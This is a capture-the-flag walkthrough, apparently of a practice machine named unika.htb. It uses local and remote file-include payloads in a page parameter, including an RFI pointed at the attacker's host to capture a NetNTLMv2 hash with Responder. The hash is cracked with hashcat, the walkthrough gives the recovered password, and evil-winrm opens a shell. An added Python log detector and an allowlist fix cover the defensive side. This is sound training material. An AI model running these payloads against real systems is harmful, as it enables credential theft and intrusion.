You need to walk before you can run
(The box that has taken me the longest so far; most of the time went into scanning and brute-forcing.)
TASK 1 How many TCP ports are open on the machine?
Number of open TCP ports on the target: 3
nmap -A -p1-65535 10.129.34.77
PS: because of the campus network's WAF restrictions, port 7680 could not be discovered directly by the scan.
TASK 2 When visiting the web service using the IP address, what is the domain that we are being redirected to?
Visiting the target IP directly redirects to: unika.htb
TASK 3 Which scripting language is being used on the server to generate webpages?
The language used to generate the target's web pages: PHP
Open Burp Suite (BP), capture a request, and the answer is right there in the response.
TASK 4 What is the name of the URL parameter which is used to load different language versions of the webpage?
The URL parameter used to load different language versions of the page: page
First, so that the redirect no longer breaks page access, edit /etc/hosts and add a line mapping the target IP to the redirect hostname; after that the target IP can be browsed normally.
Then switch the language (EN in the top-right corner) and the page parameter appears in the URL.
TASK 5 Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”
Multiple choice; the value that performs a local file include is: ../../../../../../../../windows/system32/drivers/etc/hosts
TASK 6 Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: “french.html”, “//10.10.14.6/somefile”, “../../../../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”
Likewise multiple choice; the value that performs a remote file include is: //10.10.14.6/somefile
TASK 7 What does NTLM stand for?
NTLM stands for: New Technology LAN Manager
TASK 8 Which flag do we use in the Responder utility to specify the network interface?
The Responder flag that specifies the network interface: -I (a dash followed by an uppercase I)
TASK 9 There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?
The full name of john is: John the Ripper (a tool used to crack NTLM hashes)
TASK 10 What is the password for the administrator user?
The administrator's password is: badminton
1. Start Responder listening on the local tun0 interface: responder -I tun0
2. Because the target has a remote file inclusion vulnerability, point the RFI at our own IP: ?page=//10.10.16.82/1.txt
3. Once the RFI fires, check Responder; the captured NetNTLMv2 hash is shown there
4. Crack it with a hashcat dictionary attack against rockyou.txt to recover the administrator password: hashcat -m 5600 -a 0 responder.txt rockyou.txt
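As an added example (not part of the original writeup): a small Python detector that pulls the `page` parameter out of web-server access-log lines and classifies each value as an allowed language page, a local file include attempt (directory traversal, as in Task 5) or a remote file include attempt (a `//host/share` or scheme-prefixed path, as in Task 6 and step 2 above). The log lines and the allowlist of language pages are constructed for this example and are assumptions, not values from the box.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Assumed allowlist: the language pages the application legitimately includes.
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}

# Apache combined-log style lines, constructed for this example.
SAMPLE_LOG = """\
10.10.14.6 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=french.html HTTP/1.1" 200 512
10.10.14.6 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 800
10.10.14.6 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=//10.10.16.82/1.txt HTTP/1.1" 200 0
10.10.14.6 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=minikatz.exe HTTP/1.1" 404 0
10.10.14.6 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/')

def classify_page_value(value: str) -> str:
    """Classify one `page` value as allowed, rfi, lfi or unknown."""
    v = unquote(value)  # decode %2F and friends before inspecting
    if v in ALLOWED_PAGES:
        return "allowed"
    # RFI: a URL scheme (http:, ftp:, php:) or a UNC-style //host/share path.
    # Checked before LFI because "//host" also starts with "/".
    if re.match(r"^[a-z][a-z0-9+.-]+:", v, re.I) or v.startswith(("//", "\\\\")):
        return "rfi"
    # LFI: traversal segments, an absolute path, or a Windows drive letter
    if "../" in v or "..\\" in v or v.startswith(("/", "\\")) or re.match(r"^[a-zA-Z]:", v):
        return "lfi"
    return "unknown"

def scan_log(text: str) -> list[tuple[str, str]]:
    """Return (decoded page value, verdict) for each request carrying page=."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = parse_qs(urlparse(m.group("path")).query)  # percent-decodes values
        for value in query.get("page", []):
            findings.append((value, classify_page_value(value)))
    return findings

if __name__ == "__main__":
    for value, verdict in scan_log(SAMPLE_LOG):
        print(f"{verdict:8} {value}")
```

The same classifier, used as an allowlist check in front of the include instead of on the log, is the fix for this class of bug: only values in ALLOWED_PAGES should ever reach `include`.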
TASK 11 We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What TCP port does it listen on?
The Windows service we use to access Responder remotely with the recovered password listens on TCP port: 5985
Submit root flag
Use evil-winrm to get a shell directly; the flag is on the Desktop of the mike account.